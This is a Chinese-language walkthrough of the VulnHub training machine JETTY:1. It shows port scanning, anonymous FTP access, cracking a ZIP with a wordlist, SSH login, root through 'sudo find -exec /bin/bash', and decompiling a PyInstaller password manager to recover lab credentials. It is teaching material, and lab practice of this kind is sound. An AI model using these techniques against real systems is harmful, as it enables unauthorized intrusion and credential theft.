JETTY:1 靶机渗透教学文档

靶机概述

名称: JETTY:1
难度: 提权中等难度，取证部分较难
目标: 获取root权限并收集欺诈证据
场景: Aquarium Life SL公司怀疑员工Squiddie在销售假门票
解压密码: EsSabad0!
关键提示: 可疑用户名为"Squiddie"，负责门票销售

环境配置

下载靶机: https://www.vulnhub.com/entry/jetty-1,621/
网络设置: NAT模式，启用DHCP
攻击机: Kali Linux (桥接模式)

渗透测试流程

一、信息收集

发现目标IP

nmap 192.168.1.0/24

发现靶机IP: 192.168.1.106

端口扫描与服务识别

nmap -sV -p- -O -A 192.168.1.106

开放端口:
- 21/tcp: vsftpd 3.0.3 (FTP)
- 80/tcp: Apache httpd 2.4.29 (HTTP)
- 65507/tcp: OpenSSH 7.6p1 (SSH)

dirb http://192.168.1.106

二、漏洞利用

FTP匿名登录

ftp 192.168.1.106

用户名: ftp
密码: (空)
发现文件:
- README.txt
- sshpass.zip

下载FTP文件

wget -r ftp://192.168.1.106

破解ZIP密码

fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt sshpass.zip

破解密码: seahorse!
解压后获得SSH密码文件

三、SSH登录

尝试SSH登录

用户名: squiddie (根据提示)
密码: Squ1d4r3Th3B3$t0fTh3W0rLd (从解压文件中获得)

ssh squiddie@192.168.1.106 -p 65507

升级Shell

python -c "import pty;pty.spawn('/bin/bash')"

四、权限提升

检查sudo权限

sudo -l

发现可以使用find命令

利用find提权

sudo find /home -exec /bin/bash \;

成功获取root shell

五、证据收集

用户证据

路径: /home/squiddie/Desktop/user.txt
内容(MD5): dd69f649f3e5159ddd10b83b56b2dda2
解密: 2004737969

root证据

路径: /home/microsystems/Desktop/root.txt

欺诈证明

路径: /root/Desktop/proof.txt
解密内容: 836934778

定时任务分析

crontab -l

发现每2分钟执行备份脚本: */2 etc/cron.daily/backup
备份路径: /var/backups/.docs (来自/root/Documents/.docs)

密码管理程序分析

路径: /var/backups/.docs/Password_keeper/password_keeper.exe
这是一个PyInstaller打包的Python程序

反编译步骤:

# 使用pyinstxtractor反编译
python2 ./pyinstxtractor.py ../password_keeper.exe

# 分析生成的pyc文件

关键代码分析:
- 加密密钥(base64): N2FlMjE4ZmYyOTI4ZjZiMg==
- 解密后: 7ae218ff2928f6b2
- IV值: 166fe2294df5d0f3

获取密码数据库

运行程序并输入解密密钥后获得密码:
- Instagram: S3x1B0y
- Facebook: M4rK1sS0s3X1
- Accountabilty_not_cooked: co8oiads13kt
- MoneyBalance: C5Y0wzGqq4Xw8XGD
- Pending_to_erase: 1hi2ChHrtkQsUTOc

关键证据文件

Accountabilty_not_cooked
AccountabiltyReportMorning-1112018
MoneyBalance
Pending_to_erase

总结

渗透路径:
- FTP匿名登录 → 获取SSH密码 → SSH登录 → Find提权
取证难点:
- 分析定时备份机制
- 反编译Python打包程序
- 解密密码数据库
关键点:
- 注意靶机描述中的提示信息(用户名Squiddie)
- 充分利用sudo -l检查可用命令
- 系统定时任务可能隐藏重要文件路径
- PyInstaller打包程序可通过反编译获取源代码
取证技巧:
- 查找系统自动化任务(cron)
- 分析二进制程序获取加密密钥
- 检查文档和表格中的异常数据

JETTY:1 靶机渗透教学文档靶机概述名称 : JETTY:1 难度 : 提权中等难度，取证部分较难目标 : 获取root权限并收集欺诈证据场景 : Aquarium Life SL公司怀疑员工Squiddie在销售假门票解压密码 : EsSabad0 ! 关键提示 : 可疑用户名为"Squiddie"，负责门票销售环境配置下载靶机: https://www.vulnhub.com/entry/jetty-1,621/ 网络设置: NAT模式，启用DHCP 攻击机: Kali Linux (桥接模式) 渗透测试流程一、信息收集发现目标IP 发现靶机IP: 192.168.1.106 端口扫描与服务识别开放端口: 21/tcp: vsftpd 3.0.3 (FTP) 80/tcp: Apache httpd 2.4.29 (HTTP) 65507/tcp: OpenSSH 7.6p1 (SSH) Web目录枚举未发现可利用的Web目录二、漏洞利用 FTP匿名登录用户名: ftp 密码: (空) 发现文件: README.txt sshpass.zip 下载FTP文件破解ZIP密码破解密码: seahorse! 解压后获得SSH密码文件三、SSH登录尝试SSH登录用户名: squiddie (根据提示) 密码: Squ1d4r3Th3B3$t0fTh3W0rLd (从解压文件中获得) 升级Shell 四、权限提升检查sudo权限发现可以使用find命令利用find提权成功获取root shell 五、证据收集用户证据路径: /home/squiddie/Desktop/user.txt 内容(MD5): dd69f649f3e5159ddd10b83b56b2dda2 解密: 2004737969 root证据路径: /home/microsystems/Desktop/root.txt 欺诈证明路径: /root/Desktop/proof.txt 解密内容: 836934778 定时任务分析发现每2分钟执行备份脚本: */2 etc/cron.daily/backup 备份路径: /var/backups/.docs (来自 /root/Documents/.docs ) 密码管理程序分析路径: /var/backups/.docs/Password_keeper/password_keeper.exe 这是一个PyInstaller打包的Python程序反编译步骤 : 关键代码分析: 加密密钥(base64): N2FlMjE4ZmYyOTI4ZjZiMg== 解密后: 7ae218ff2928f6b2 IV值: 166fe2294df5d0f3 获取密码数据库运行程序并输入解密密钥后获得密码: Instagram: S3x1B0y Facebook: M4rK1sS0s3X1 Accountabilty_ not_ cooked: co8oiads13kt MoneyBalance: C5Y0wzGqq4Xw8XGD Pending_ to_ erase: 1hi2ChHrtkQsUTOc 关键证据文件 Accountabilty_ not_ cooked AccountabiltyReportMorning-1112018 MoneyBalance Pending_ to_ erase 总结渗透路径 : FTP匿名登录 → 获取SSH密码 → SSH登录 → Find提权取证难点 : 分析定时备份机制反编译Python打包程序解密密码数据库关键点 : 注意靶机描述中的提示信息(用户名Squiddie) 充分利用sudo -l检查可用命令系统定时任务可能隐藏重要文件路径 PyInstaller打包程序可通过反编译获取源代码取证技巧 : 查找系统自动化任务(cron) 分析二进制程序获取加密密钥检查文档和表格中的异常数据